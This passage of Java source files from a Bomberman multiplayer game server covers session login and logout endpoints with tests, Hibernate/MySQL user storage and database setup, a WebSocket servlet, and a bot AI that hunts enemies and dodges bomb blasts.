return WebErrorManager.serverError("Session exists, but user does not!");
if (supplicant.getId() == id) {
accountService.logoutUser(supplicant.getSessionID());
accountService.deleteUser(id);
return WebErrorManager.ok();
}
else return WebErrorManager.accessForbidden("Not your user!");
} else
return WebErrorManager.authorizationRequired("Not logged in!");
}
private AccountService accountService;
private String staticPath;
private int userpicWidth;
private int userpicHeight;
private boolean wasSetUp = false;
}
<file_sep>/src/test/java/rest/SessionsTest.java
package rest;
import constants.Constants;
import main.accountservice.AccountService;
import main.UserTokenManager;
import main.config.Context;
import org.glassfish.hk2.utilities.binding.AbstractBinder;
import org.glassfish.jersey.server.ResourceConfig;
import org.javatuples.Pair;
import org.javatuples.Triplet;
import org.json.JSONObject;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotSame;
import static org.junit.Assert.fail;
import static org.mockito.Mockito.mock;
import org.glassfish.jersey.test.JerseyTest;
import javax.servlet.http.HttpServletRequest;
import javax.ws.rs.core.*;
public class SessionsTest extends JerseyTest {
@Test
public void testOkLogin() {
testLogin(RequestFactory.getLoginTestData(RequestFactory.LoginRequestType.LOGIN_OK), true);
}
@Test
public void testWrongLoginLogin() {
testLogin(RequestFactory.getLoginTestData(RequestFactory.LoginRequestType.LOGIN_WRONG_LOGIN), false);
}
@Test
public void testWrongPasswordLogin() {
testLogin(RequestFactory.getLoginTestData(RequestFactory.LoginRequestType.LOGIN_WRONG_PASSWORD), false);
}
@Test
public void testOkIsAuthenticated() {
testIsAuthenticated(RequestFactory.getIsAuthenticatedTestData(RequestFactory.IsAuthRequestType.IS_AUTH_OK));
}
@Test
public void testNoCookieIsAuthenticated() {
testIsAuthenticated(RequestFactory.getIsAuthenticatedTestData(RequestFactory.IsAuthRequestType.IS_AUTH_NO_COOKIE));
}
@Test
public void testWrongCookieIsAuthenticated() {
testIsAuthenticated(RequestFactory.getIsAuthenticatedTestData(RequestFactory.IsAuthRequestType.IS_AUTH_WRONG_COOKIE));
}
@Test
public void testOkLogout() {
testLogout(RequestFactory.getLogoutTestData(RequestFactory.LogoutRequestType.LOGOUT_LOGGED));
}
@Test
public void testNoCookieLogout() {
testLogout(RequestFactory.getLogoutTestData(RequestFactory.LogoutRequestType.LOGOUT_NOT_LOGGED));
}
@Test
public void testWrongCookieLogout() {
testLogout(RequestFactory.getLogoutTestData(RequestFactory.LogoutRequestType.LOGOUT_WRONG_COOKIE));
}
@Before
public void setContext() {
sessions.setContext(CONTEXT);
}
public void testLogin(Triplet<String, HttpHeaders, Response> data, boolean shouldHaveCookie){
final Response response = sessions.loginUser(data.getValue0(), data.getValue1());
assertEquals(data.getValue2().toString(), response.toString());
assertEquals(data.getValue2().getEntity().toString(), response.getEntity().toString());
if (shouldHaveCookie)
assertEquals(SID, response.getCookies().get(UserTokenManager.COOKIE_NAME).getValue());
else
assertEquals(false, response.getCookies().containsKey(UserTokenManager.COOKIE_NAME));
}
public void testIsAuthenticated(Pair<HttpHeaders, Response> data) {
final Response response = sessions.isAuthenticated(data.getValue0());
assertEquals(data.getValue1().toString(), response.toString());
assertEquals(data.getValue1().getEntity().toString(), response.getEntity().toString());
}
public void testLogout(Pair<HttpHeaders, Response> data) {
final Response response = sessions.logoutUser(data.getValue0());
assertEquals(data.getValue1().toString(), response.toString());
assertEquals(data.getValue1().getEntity().toString(), response.getEntity().toString());
assertNotSame(SID, response.getCookies().get(UserTokenManager.COOKIE_NAME).getValue());
}
@BeforeClass
public static void makeContext() throws InstantiationException {
final AccountService mockedAccountService = Constants.RestApplicationMocks.getMockedAccountService();
CONTEXT.put(AccountService.class, mockedAccountService);
}
@Override
protected Application configure() {
//noinspection OverlyBroadCatchBlock
try {
final ResourceConfig config = new ResourceConfig(Sessions.class);
final HttpServletRequest request = mock(HttpServletRequest.class);
//noinspection AnonymousInnerClassMayBeStatic
config.register(new AbstractBinder() {
@Override
protected void configure() {
bind(CONTEXT);
bind(request).to(HttpServletRequest.class);
}
});
return config;
} catch (Exception ex) {
ex.printStackTrace();
fail();
}
return null;
}
private static class RequestFactory {
public static Triplet<String, HttpHeaders, Response> getLoginTestData(LoginRequestType type){
switch (type)
{
case LOGIN_OK:
return Triplet.with(okLoginJSON(), NO_COOKIE_HEADERS, okLoginResponse());
case LOGIN_WRONG_LOGIN:
return Triplet.with(wrongLoginLoginJSON(), NO_COOKIE_HEADERS, wrongLoginLoginResponse());
case LOGIN_WRONG_PASSWORD:
return Triplet.with(wrongPasswordLoginJSON(), NO_COOKIE_HEADERS, wrongPasswordLoginResponse());
}
throw new IllegalArgumentException();
}
public static Pair<HttpHeaders, Response> getIsAuthenticatedTestData(IsAuthRequestType type) {
switch (type) {
case IS_AUTH_OK:
return Pair.with(OK_COOKIE_HEADERS, okIsAuthResponse());
case IS_AUTH_NO_COOKIE:
return Pair.with(NO_COOKIE_HEADERS, wrongIsAuthResponse());
case IS_AUTH_WRONG_COOKIE:
return Pair.with(WRONG_COOKIE_HEADERS, wrongIsAuthResponse());
}
throw new IllegalArgumentException();
}
public static Pair<HttpHeaders, Response> getLogoutTestData(LogoutRequestType type) {
switch (type) {
case LOGOUT_LOGGED:
return Pair.with(OK_COOKIE_HEADERS, okLogoutResponse());
case LOGOUT_NOT_LOGGED:
return Pair.with(NO_COOKIE_HEADERS, wrongLogoutResponse());
case LOGOUT_WRONG_COOKIE:
return Pair.with(WRONG_COOKIE_HEADERS, wrongLogoutResponse());
}
throw new IllegalArgumentException();
}
private static String okLoginJSON() {
return new JSONObject().put("login", LOGIN).put("password", <PASSWORD>).toString();
}
private static Response okLoginResponse() {
return Response.ok(new JSONObject().put("id", ID).toString()).build();
}
private static String wrongLoginLoginJSON() {
return new JSONObject().put("login", "").put("password", <PASSWORD>).toString();
}
private static Response wrongLoginLoginResponse() {
return WebErrorManager.authorizationRequired("Wrong login!");
}
private static String wrongPasswordLoginJSON() {
return new JSONObject().put("login", LOGIN).put("password", "").toString();
}
private static Response wrongPasswordLoginResponse() {
return WebErrorManager.authorizationRequired("Wrong login-password pair!");
}
private static Response okIsAuthResponse() {
return Response.ok(new JSONObject().put("id", ID).toString()).build();
}
private static Response wrongIsAuthResponse() {
return WebErrorManager.authorizationRequired();
}
private static Response okLogoutResponse() {
return WebErrorManager.okRaw("You have succesfully logged out.").cookie(UserTokenManager.getNewNullCookie()).build();
}
private static Response wrongLogoutResponse() {
return WebErrorManager.ok("You was not logged in.");
}
@SuppressWarnings("InnerClassTooDeeplyNested")
public enum LoginRequestType {LOGIN_OK, LOGIN_WRONG_LOGIN, LOGIN_WRONG_PASSWORD}
@SuppressWarnings("InnerClassTooDeeplyNested")
public enum IsAuthRequestType {IS_AUTH_OK, IS_AUTH_WRONG_COOKIE, IS_AUTH_NO_COOKIE}
@SuppressWarnings("InnerClassTooDeeplyNested")
public enum LogoutRequestType {LOGOUT_LOGGED, LOGOUT_NOT_LOGGED, LOGOUT_WRONG_COOKIE}
}
private static final Context CONTEXT = new Context();
private final Sessions sessions = new Sessions();
private static final HttpHeaders NO_COOKIE_HEADERS = Constants.RestApplicationMocks.getNoCookieHeaders();
private static final HttpHeaders OK_COOKIE_HEADERS = Constants.RestApplicationMocks.getOkCookieHeaders();
private static final HttpHeaders WRONG_COOKIE_HEADERS = Constants.RestApplicationMocks.getWrongCookieHeaders();
@SuppressWarnings("ConstantNamingConvention")
private static final long ID = Constants.USER_ID;
private static final String LOGIN = Constants.USER_LOGIN;
private static final String PASSWORD = <PASSWORD>;
private static final String SID = Constants.USER_SESSION_ID;
}
<file_sep>/src/main/java/main/databaseservice/UserProfileDataDAO.java
package main.databaseservice;
import org.hibernate.Criteria;
import org.hibernate.Session;
import org.hibernate.Transaction;
import org.hibernate.criterion.Order;
import org.hibernate.criterion.Restrictions;
import java.util.List;
public class UserProfileDataDAO {
public UserProfileDataDAO(Session session) {
this.session = session;
}
public void save(UserProfileData dataSet) {
session.saveOrUpdate(dataSet);
}
public UserProfileData read(long id) {
return session.get(UserProfileData.class, id);
}
public UserProfileData readByName(String name) {
final Criteria criteria = session.createCriteria(UserProfileData.class);
return (UserProfileData) criteria.add(Restrictions.eq("login", name)).uniqueResult();
}
@SuppressWarnings("unchecked")
public List<UserProfileData> readAll() {
final Criteria criteria = session.createCriteria(UserProfileData.class);
return (List<UserProfileData>) criteria.list();
}
@SuppressWarnings("unchecked")
public List<UserProfileData> readTop10() {
final Criteria criteria = session.createCriteria(UserProfileData.class);
return (List<UserProfileData>) criteria.addOrder(Order.desc("score")).setMaxResults(10).list();
}
public void delete(long id) {
final UserProfileData dataSet = new UserProfileData();
dataSet.setId(id);
final Transaction transaction = session.beginTransaction();
session.delete(dataSet);
transaction.commit();
}
private final Session session;
}
<file_sep>/src/test/java/main/databaseService/DataBaseServiceHashMapImplTest.java
package main.databaseservice;
import constants.Constants;
import org.junit.Before;
import org.junit.Test;
import rest.UserProfile;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;
import static org.junit.Assert.*;
public class DataBaseServiceHashMapImplTest {
@Before
public void init() throws Exception {
dataBaseService = new DataBaseServiceHashMapImpl();
}
@Test
public void testAddUser() throws Exception {
UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
assertEquals( dataBaseService.getById(user.getId()), dataBaseService.getByLogin(user.getLogin()));
user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNull(user);
}
@Test
public void testDeleteUser() throws Exception {
final UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
final String login = user.getLogin();
final long id = user.getId();
dataBaseService.deleteUser(id);
assertNull( dataBaseService.getById(id));
assertNull( dataBaseService.getByLogin(login));
}
@Test
public void testGetUsers() throws Exception {
final UserProfile user1 = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
final UserProfile user2 = dataBaseService.addUser("user1", "user1");
assertNotNull(user1);
assertNotNull(user2);
final Map<Long, UserProfile> map = new HashMap<>();
map.put(user1.getId(), user1);
map.put(user2.getId(), user2);
final Collection<UserProfile> userData = dataBaseService.getUsers();
assertNotNull(userData);
assertEquals(map.values().toString(), userData.toString());
}
@Test
public void testContainsID() throws Exception {
final UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
long id = user.getId();
assertEquals(true, dataBaseService.containsID(id));
id = -1L;
assertEquals(false, dataBaseService.containsID(id));
}
@Test
public void testGetById() throws Exception {
final UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
final long id = user.getId();
assertEquals(user, dataBaseService.getById(id));
}
@Test
public void testGetByLogin() throws Exception {
final UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
assertEquals(user, dataBaseService.getByLogin(Constants.USER_LOGIN));
}
@Test
public void testContainsLogin() throws Exception {
final UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
assertEquals(true, dataBaseService.containsLogin(Constants.USER_LOGIN));
assertEquals(false, dataBaseService.containsLogin(""));
}
private DataBaseService dataBaseService;
}<file_sep>/src/main/java/main/websockets/WebSocketConnectionServlet.java
package main.websockets;
import main.config.Context;
import org.eclipse.jetty.websocket.servlet.WebSocketServlet;
import org.eclipse.jetty.websocket.servlet.WebSocketServletFactory;
import javax.servlet.annotation.WebServlet;
@WebServlet(name = "WebSocketConnectionServlet", urlPatterns = {"/game"})
public class WebSocketConnectionServlet extends WebSocketServlet {
public WebSocketConnectionServlet(Context context,int timeout) {
idleTime = timeout;
this.context = context;
}
@Override
public void configure(WebSocketServletFactory webSocketServletFactory) {
webSocketServletFactory.getPolicy().setIdleTimeout(idleTime);
webSocketServletFactory.setCreator(new WebSocketConnectionCreator(context));
}
private final int idleTime;
private final Context context;
}
<file_sep>/src/main/java/bomberman/mechanics/WorldBuilderForeman.java
package bomberman.mechanics;
import bomberman.mechanics.interfaces.IWorldBuilder;
import bomberman.mechanics.worldbuilders.BasicWorldBuilder;
import bomberman.mechanics.worldbuilders.TextWorldBuilder;
import bomberman.mechanics.worldbuilders.TextWorldBuilderV11;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import java.util.*;
import java.util.stream.Collectors;
public class WorldBuilderForeman {
public static IWorldBuilder getWorldBuilderInstance(String worldType) {
if (BUILDERS.containsKey(worldType))
return BUILDERS.get(worldType);
else {
LOGGER.warn("Cannot find \"" + worldType + "\" template! Returning empty basic world instead.");
return new BasicWorldBuilder();
}
}
public static String getRandomWorldName() {
final Set<Map.Entry<String, IWorldBuilder>> builderSet = BUILDERS.entrySet();
final ArrayList<String> names = builderSet.stream().map(Map.Entry::getKey).collect(Collectors.toCollection(ArrayList::new));
if (lastWorldNum == names.size())
lastWorldNum = 0;
return names.get(lastWorldNum++);
}
private static Map<String, IWorldBuilder> collectBuilders() {
final Map<String, IWorldBuilder> all = new HashMap<>();
final Map<String, IWorldBuilder> v10 = TextWorldBuilder.getAllTextBuilders();
final Map<String, IWorldBuilder> v11 = TextWorldBuilderV11.getAllTextBuilders();
all.putAll(v10);
all.putAll(v11);
return all;
}
private static final Map<String, IWorldBuilder> BUILDERS = collectBuilders();
private static final Logger LOGGER = LogManager.getLogger(WorldBuilderForeman.class);
private static Integer lastWorldNum = 0;
}
<file_sep>/src/main/java/bomberman/mechanics/SimpleBotBehavior.java
package bomberman.mechanics;
import bomberman.mechanics.interfaces.EntityType;
import bomberman.mechanics.interfaces.ITile;
import bomberman.mechanics.interfaces.Updateable;
import bomberman.service.TimeHelper;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.javatuples.Pair;
import org.javatuples.Triplet;
import java.util.*;
public class SimpleBotBehavior implements Updateable {
SimpleBotBehavior(Bomberman owner, World world) {
this.owner = owner;
this.world = world;
}
@Override
public void update(long deltaT) {
//noinspection OverlyBroadCatchBlock
try {
selectNextTargetIfNeeded();
passMovementsToTarget();
} catch (Exception ex) {
LOGGER.error("Something happened in bot's " + owner + " behavior " + this, ex);
}
}
private boolean selectNextTargetIfNeeded() {
if (target.wasReached() && target.canLayBomb()) {
world.tryPlacingBomb(owner.getID(), false);
movementsToTarget.clear();
pathFinder.makeEvasionFromBomb();
return false;
}
if (target.isInvalid() || target.wasReached()) {
movementsToTarget.clear();
pathFinder.selectNewTarget();
return true;
}
return false;
}
private void passMovementsToTarget() {
final Triplet<Float, Float, Long> nextMovement = movementsToTarget.peek();
if (nextMovement != null && nextMovement.getValue2() >= TimeHelper.now()) {
owner.addMovement(nextMovement);
movementsToTarget.remove();
}
}
private class Target {
public Target setX(int x) {
this.x = x;
return this;
}
public Target setY(int y) {
this.y = y;
return this;
}
public void invalidateTarget() {
x = -1;
y = -1;
}
public int getY() {
return y;
}
public int getX() {
return x;
}
public boolean shouldLayBomb() {
return shouldLayBomb;
}
public Target makeLayBomb(@SuppressWarnings("ParameterHidesMemberVariable") boolean shouldLayBomb) {
this.shouldLayBomb = shouldLayBomb;
return this;
}
public boolean canLayBomb() {
if (shouldLayBomb && owner.canSpawnBomb())
if (owner.getCoordinates()[0] == x && owner.getCoordinates()[1] == y)
if (distanceTo(x, y) < owner.getBombExplosionRange())
return true;
return false;
}
public boolean isEvasionTarget() {
return isEvasionTarget;
}
public void makeEvasionTarget(boolean evasionTarget) {
isEvasionTarget = evasionTarget;
}
public boolean isFirstTime() {
return (x != -1) && (y != -1);
}
private boolean isInvalid() {
if (isFirstTime() || wasReached())
return true;
if (isEvasionTarget)
return false;
boolean isInvalid = true;
if (world.getTiles()[y][x] != null && world.getTiles()[y][x].isDestructible())
// If target is tile
isInvalid = false;
else {
boolean isOneOfThemIsValid = false;
// If target is something else
for (Bomberman bomberman : world.getBombermen())
if (!bomberman.equals(owner))
if (distanceTo(bomberman.getCoordinates()[0], bomberman.getCoordinates()[1]) < LOOK_FOR_ENEMY_RADIUS) {
// If distance is ok
final int enemyX = (int) Math.floor(bomberman.getCoordinates()[0]);
final int enemyY = (int) Math.floor(bomberman.getCoordinates()[0]);
if (x == enemyX || y == enemyY)
// If enemy has not moved
isOneOfThemIsValid = true;
}
if (isOneOfThemIsValid)
isInvalid = false;
}
return isInvalid;
}
public boolean wasReached() {
return distanceTo(x, y) < 0.45f;
}
public double distanceTo(double anotherX, double anotherY) {
/*
final double distanceX = Math.abs(owner.getCoordinates()[0] - anotherX);
final double distanceY = Math.abs(owner.getCoordinates()[1] - anotherY);
return Math.sqrt(distanceX * distanceX + distanceY * distanceY);
*/
return pathFinder.distanceBetween(owner.getCoordinates()[0], owner.getCoordinates()[1], anotherX, anotherY);
}
public boolean isBonus(ITile tile) {
boolean result = false;
if (tile != null)
if (tile.getType() == EntityType.BONUS_DECBOMBSPAWN ||
tile.getType() == EntityType.BONUS_DROPBOMBONDEATH ||
tile.getType() == EntityType.BONUS_INCMAXHP ||
tile.getType() == EntityType.BONUS_INCMAXRANGE ||
tile.getType() == EntityType.BONUS_INCSPEED ||
tile.getType() == EntityType.BONUS_INVUL ||
tile.getType() == EntityType.BONUS_MOREBOMBS)
result = true;
return result;
}
public boolean isDestructibleWall(ITile tile) {
boolean result = false;
if (tile != null)
if (tile.getType() == EntityType.DESTRUCTIBLE_WALL)
result = true;
return result;
}
@SuppressWarnings("InstanceVariableNamingConvention")
private int x = -1;
@SuppressWarnings("InstanceVariableNamingConvention")
private int y = -1;
private boolean shouldLayBomb = false;
private boolean isEvasionTarget = false;
}
private final Target target = new Target();
private class PathFinder {
public void calculatePathToTarget() {
calculatePathTo(target.getX(), target.getY());
}
public void makeEvasionFromBomb() {
final int bombX = (int) owner.getCoordinates()[0];
final int bombY = (int) owner.getCoordinates()[1];
final int bombRadius = owner.getBombExplosionRange();
final List<Pair<Integer, Integer>> movementsList = calculateEvasionPath(bombX, bombY, 0, bombX, bombY, bombRadius);
target.makeEvasionTarget(true);
target.makeLayBomb(false);
storeMovements(movementsList);
}
private void storeMovements(List<Pair<Integer, Integer>> movementsList) {
long movementStartTime = TimeHelper.now();
int prevTileX = (int) owner.getCoordinates()[0];
int prevTileY = (int) owner.getCoordinates()[1];
for (Pair<Integer, Integer> movement : movementsList) {
movementsToTarget.add(new Triplet<>((float) prevTileX - movement.getValue0(), (float) prevTileY - movement.getValue1(), movementStartTime));
movementStartTime += getMovementCompletitonTime(distanceBetween(prevTileX, prevTileY, movement.getValue0(), movement.getValue1()));
prevTileX = movement.getValue0();
prevTileY = movement.getValue1();
}
}
public double distanceBetween(double otherX, double otherY, double anotherX, double anotherY) {
final double distanceX = Math.abs(otherX - anotherX);
final double distanceY = Math.abs(otherY - anotherY);
return Math.sqrt(distanceX * distanceX + distanceY * distanceY);
}
public void selectNewTarget() {
target.makeEvasionTarget(false);
if (markBombermanAsATarget(KILL_ENEMY_NOW_RADIUS))
target.makeLayBomb(true);
else if (seekForASpecificTile(GATHER_BONUS_RADIUS, target::isBonus))
target.makeLayBomb(false);
else if (seekForASpecificTile(BREAK_WALL_RADIUS, target::isDestructibleWall))
target.makeLayBomb(true);
else if (markBombermanAsATarget(KILL_ENEMY_ANYWAY))
target.makeLayBomb(true);
}
private boolean markBombermanAsATarget(int notFartherThan) {
Bomberman enemy = null;
for (Bomberman bomberman : world.getBombermen())
if (bomberman.getID() != owner.getID())
if (target.distanceTo(bomberman.getCoordinates()[0], bomberman.getCoordinates()[1]) < notFartherThan) {
enemy = bomberman;
break;
}
if (enemy != null) {
target.setX((int) enemy.getCoordinates()[0]);
target.setY((int) enemy.getCoordinates()[1]);
return true;
}
return false;
}
private boolean seekForASpecificTile(int notFartherThan, SpecificTileCondition cond) {
final List<Pair<Integer, Integer>> movementsToASpecificTile = movementsToASpecificTile((int) owner.getCoordinates()[0], (int) owner.getCoordinates()[1], 0, notFartherThan, cond);
if (!movementsToASpecificTile.isEmpty()) {
storeMovements(movementsToASpecificTile);
return true;
} else
return false;
}
private List<Pair<Integer, Integer>> movementsToASpecificTile(int x, int y, int iterationDepth, int notFartherThan, SpecificTileCondition cond) {
List<Pair<Integer, Integer>> movementsToReachSafeTile = new LinkedList<>();
final ArrayList<List<Pair<Integer, Integer>>> sortArray = new ArrayList<>(4);
for (int dx = -1; dx < 2; dx += 2)
for (int dy = -1; dy < 2; dy += 2) {
final ITile tile = world.getTiles()[y + dy][x + dx];
if (cond.isThisKindOfITile(tile)) {
final LinkedList<Pair<Integer, Integer>> safeMovement = new LinkedList<>();
safeMovement.add(new Pair<>(x + dx, y + dy));
return safeMovement;
} else if (iterationDepth <= notFartherThan && isTileSafe(x + dx, y + dy)) {
final List<Pair<Integer, Integer>> nextMovements = movementsToASpecificTile(x + dx, y + dy, iterationDepth + 1, notFartherThan, cond);
if (!nextMovements.isEmpty()) {
nextMovements.add(0, new Pair<>(x + dx, y + dy));
sortArray.add(nextMovements);
}
}
}
boolean movementsToTargetNotTouched = true;
if (!sortArray.isEmpty())
for (List<Pair<Integer, Integer>> movementList : sortArray)
if (movementsToTargetNotTouched || movementList.size() < movementsToReachSafeTile.size()) {
movementsToTargetNotTouched = false;
movementsToReachSafeTile = movementList;
}
return movementsToReachSafeTile;
}
// TODO: Move bombY, bombX, bombRadius into a separate lambda and unite this method with previous one.
private List<Pair<Integer, Integer>> calculateEvasionPath(int x, int y, int iterationDepth, int bombX, int bombY, int bombRadius) {
List<Pair<Integer, Integer>> movementsToReachSafeTile = new LinkedList<>();
final ArrayList<List<Pair<Integer, Integer>>> sortArray = new ArrayList<>(4);
for (int dx = -1; dx < 2; dx += 2)
for (int dy = -1; dy < 2; dy += 2)
if (isTileSafeFromExplosion(x + dx, y + dy, bombX, bombY, bombRadius)) {
final LinkedList<Pair<Integer, Integer>> safeMovement = new LinkedList<>();
safeMovement.add(new Pair<>(x + dx, y + dy));
return safeMovement;
} else
if (iterationDepth <= getMaximalRecursionDepth()) {
final List<Pair<Integer, Integer>> nextMovements = calculateEvasionPath(x + dx, y + dy, iterationDepth + 1, bombX, bombY, bombRadius);
if (!nextMovements.isEmpty()) {
nextMovements.add(0, new Pair<>(x + dx, y + dy));
sortArray.add(nextMovements);
}
}
boolean movementsToTargetNotTouched = true;
if (!sortArray.isEmpty())
for (List<Pair<Integer, Integer>> movementList : sortArray)
if (movementsToTargetNotTouched || movementList.size() < movementsToReachSafeTile.size()) {
movementsToTargetNotTouched = false;
movementsToReachSafeTile = movementList;
}
return movementsToReachSafeTile;
}
private void calculatePathTo(double x, double y) {
}
private void calculatePathTo(int x, int y) {
calculatePathTo(Math.floor(x) + 0.5, Math.floor(y) + 0.5);
}
private long getMovementCompletitonTime(double distance) {
return (long) Math.floor(distance / owner.getMaximalSpeed());
}
private boolean isTileSafeFromExplosion(int tileX, int tileY, int bombX, int bombY, int bombRadius) {
if (isTileSafe(tileX, tileY)) {
if (tileX != bombX || tileY != bombY)
return true;
if (distanceBetween(tileX, tileY, bombX, bombY) > bombRadius)
return true;
}
//Lazy to check any obstacles
return false;
}
private boolean isTileSafe(int tileX, int tileY) {
if (tileX < 0 || tileX > world.getWidth())
return false;
if (tileY < 0 || tileY > world.getHeight())
return false;
final ITile tile = world.getTiles()[tileY][tileX];
return tile == null || tile.isPassable() && tile.getType() != EntityType.BOMB_RAY;
}
private int getMaximalRecursionDepth() {
return owner.getBombExplosionRange();
}
public static final int KILL_ENEMY_NOW_RADIUS = 4; // any enemy bomberman within 5 tile radius will be a target.
public static final int GATHER_BONUS_RADIUS = 8; // any bonus within 8 tile radius will be a target.
public static final int BREAK_WALL_RADIUS = 12; // covers ~2/3 of the map. Any breakable wall will be attemted to be removed
public static final int KILL_ENEMY_ANYWAY = 256; // if the map is scorched and nothing else can be broken, scout and destroy enemies!
}
private final PathFinder pathFinder = new PathFinder();
interface SpecificTileCondition {
boolean isThisKindOfITile(ITile tile);
}
private final Bomberman owner;
private final World world;
private final Queue<Triplet<Float, Float, Long>> movementsToTarget = new LinkedList<>();
private static final float LOOK_FOR_ENEMY_RADIUS = 5.0f; // 10 tiles in diameter
private static final Logger LOGGER = LogManager.getLogger(SimpleBotBehavior.class);
}
<file_sep>/src/main/java/main/databaseservice/DataBaseServiceMySQLImpl.java
package main.databaseservice;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.hibernate.*;
import org.jetbrains.annotations.Nullable;
import rest.UserProfile;
import java.sql.*;
import java.util.*;
import org.hibernate.boot.registry.StandardServiceRegistryBuilder;
import org.hibernate.cfg.Configuration;
import org.hibernate.service.ServiceRegistry;
public class DataBaseServiceMySQLImpl implements DataBaseService, AutoCloseable {
public DataBaseServiceMySQLImpl(Map<String, String> parameters) throws Exception {
config = new Config(parameters, DBTYPE.PRODUCTION);
createDBAndSetup();
}
public DataBaseServiceMySQLImpl(Map<String, String> parameters, DBTYPE dbtype) throws Exception {
config = new Config(parameters, dbtype);
createDBAndSetup();
}
public void createDBAndSetup() throws Exception {
try {
setup();
} catch (HibernateException ex) {
//noinspection OverlyBroadCatchBlock
try {
LOGGER.warn("Could not connect to DB. Attempting to create it.");
connectToDBOrDie();
setup();
} catch (Exception ex2) {
LOGGER.fatal("Check if MySQL is running and is compatible with 5.1.38 mysql/j.", ex2);
throw ex2;
}
}
}
@Override
public void save(UserProfileData dataSet) {
try (Session session = sessionFactory.openSession()) {
final Transaction transaction = session.beginTransaction();
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
dao.save(dataSet);
transaction.commit();
}
}
@Override
@Nullable
public UserProfile getById(long id) {
try (Session session = sessionFactory.openSession()) {
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
final UserProfileData data = dao.read(id);
if (data == null)
return null;
else
return new UserProfile(dao.read(id));
} catch (HibernateException ex) {
final String reason = "Could not get user #" + id + " by ID!";
LOGGER.info(reason, ex);
return null;
}
}
@Override
@Nullable
public UserProfile getByLogin(String name) {
try (Session session = sessionFactory.openSession()) {
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
final UserProfileData data = dao.readByName(name);
if (data == null)
return null;
else
return new UserProfile(dao.readByName(name));
} catch (HibernateException ex) {
final String reason = "Could not get user \"" + name + "\" by login!";
LOGGER.info(reason, ex);
return null;
}
}
@Override
@Nullable
public Collection<UserProfile> getUsers() {
try (Session session = sessionFactory.openSession()) {
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
final LinkedList<UserProfile> result = new LinkedList<>();
dao.readAll().stream().forEach((data) -> result.add(new UserProfile(data)));
return result;
} catch (HibernateException ex) {
final String reason = "Could not get all users somewhy! O_o";
LOGGER.error(reason, ex);
return null;
}
}
@Override
@Nullable
public Collection<UserProfile> getTop10Users() {
try (Session session = sessionFactory.openSession()) {
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
final LinkedList<UserProfile> result = new LinkedList<>();
dao.readTop10().stream().forEach((data) -> result.add(new UserProfile(data)));
return result;
} catch (HibernateException ex) {
final String reason = "Could not get Top10 users somewhy! O_o";
LOGGER.error(reason, ex);
return null;
}
}
@Override
@Nullable
public UserProfile addUser(String login, String password, boolean isGuest) {
if (containsLogin(login))
return null;
final UserProfileData newUser = new UserProfileData(login, password, isGuest);
save(newUser);
return getByLogin(login);
}
@Nullable
@Override
public UserProfile addUser(String login, String password) {
return addUser(login, password, false);
}
@Override
public boolean containsID(Long id) {
return getById(id) != null;
}
@Override
public boolean containsLogin(String name) {
return getByLogin(name) != null;
}
@Override
public void deleteUser(Long id) {
try (Session session = sessionFactory.openSession()) {
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
dao.delete(id);
} catch (HibernateException ex) {
final String reason = "Could not delete user #" + id + '!';
LOGGER.error(reason, ex);
}
}
@Override
public void close() {
sessionFactory.close();
}
private static SessionFactory createSessionFactory(Configuration configuration) {
final StandardServiceRegistryBuilder builder = new StandardServiceRegistryBuilder();
builder.applySettings(configuration.getProperties());
final ServiceRegistry serviceRegistry = builder.build();
return configuration.buildSessionFactory(serviceRegistry);
}
private void setup() throws HibernateException {
LOGGER.info("-----Initializing Hibernate-----");
final Configuration configuration = new Configuration();
configuration.addAnnotatedClass(UserProfileData.class);
configuration.setProperty("hibernate.dialect", "org.hibernate.dialect.MySQLDialect");
configuration.setProperty("hibernate.connection.driver_class", "com.mysql.jdbc.Driver");
configuration.setProperty("hibernate.connection.url", config.getAddress() + config.getDbName());
configuration.setProperty("hibernate.connection.username", config.getLogin());
configuration.setProperty("hibernate.connection.password", config.getPassword());
configuration.setProperty("hibernate.show_sql", "true");
configuration.setProperty("hibernate.hbm2ddl.auto", config.getCreationMethod());
sessionFactory = createSessionFactory(configuration);
LOGGER.info("-----Hibernate Initialized-----");
}
@SuppressWarnings({"JDBCResourceOpenedButNotSafelyClosed"})
private void connectToDBOrDie() throws Exception {
Connection rootConnection = null;
//noinspection OverlyBroadCatchBlock
try {
final Driver driver = (Driver) Class.forName("com.mysql.jdbc.Driver").newInstance();
DriverManager.registerDriver(driver);
DriverManager.setLoginTimeout(1);
rootConnection = DriverManager.getConnection(config.getAddress(), "root", config.getRootPassword());
final Statement statement = rootConnection.createStatement();
statement.execute("DROP USER IF EXISTS " + config.getLoginDomain());
statement.execute("CREATE USER " + config.getLoginDomain() + " IDENTIFIED BY \"" + config.getPassword() + "\";");
statement.execute("DROP DATABASE IF EXISTS " + config.getDbName() + ';');
statement.execute("CREATE DATABASE IF NOT EXISTS " + config.getDbName() + ';');
statement.execute("GRANT ALL ON " + config.getDbName() + ".* TO " + config.getLoginDomain() + ';');
LOGGER.info("Database succesfully created!");
} catch (Exception ex) {
LOGGER.fatal("Could not create database!", ex);
throw ex;
} finally {
